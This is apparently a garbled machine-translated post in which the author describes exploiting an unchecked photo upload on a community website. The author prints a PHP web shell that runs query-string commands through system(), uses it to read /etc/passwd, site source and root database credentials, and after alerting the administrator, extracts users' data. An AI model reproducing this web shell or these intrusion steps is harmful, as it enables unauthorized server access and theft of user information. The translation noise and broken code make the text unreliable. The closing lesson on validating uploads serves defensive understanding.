Security of php community websites

Currently, I have found that uploading a photo on a community website poses a major security risk because the upload program does not analyze the uploaded files so that I can upload a test file. php file, and then the name on the server is ?????. Php (????? Is a number), my PHP content is as follows: lt ;? $ Dbsmysql_co currently, I found that uploading "my photos" on a community website poses a major security risk because the upload program did not analyze the uploaded files, so that I can upload a test. php file, and then the name on the server is ?????. Php (????? Is a number ),

My PHP content is as follows:

<?

$ Dbs = mysql_connect ($ strDBHost, $ strDBUser, $ strDBPassword );

......

Mysql_close ($ dbs );

?>



Of course ...... I only did a test and didn't actually use the database, but I used another PHP ,?????. Php:

<?

$ Query = getenv ("QUERY_STRING ");

$ Command = urldecode ($ query );

$ Stdout = system ("$ command ");

Echo "$ stdout ";

?>



Successful acquisition

$ StrDBHost = "?.?.?.? ";

$ StrDBPassword = "???? ";

$ StrDBUser = "root ";

Connect to the database



Use the next PHP file to name the uploaded PHP file CMD. PHP and DB. PHP.



The MAIN. PHP source code of the/ETC/PASSWD and the home page of the website is obtained successfully.



Then I sent a mail warning to the network administrator, but they didn't fix the vulnerability in time on the first day. so I analyzed the database and uploaded a MB. PHP file to get the user information in the database.



Today, they are repairing the problem by moving the directory that can be uploaded, but this will prevent users from browsing and uploading photos for the moment.



Therefore, when performing this design, you should consider that malicious users pass malicious data to a program by directly calling the url, rather than thinking that the webpage is secure on the server!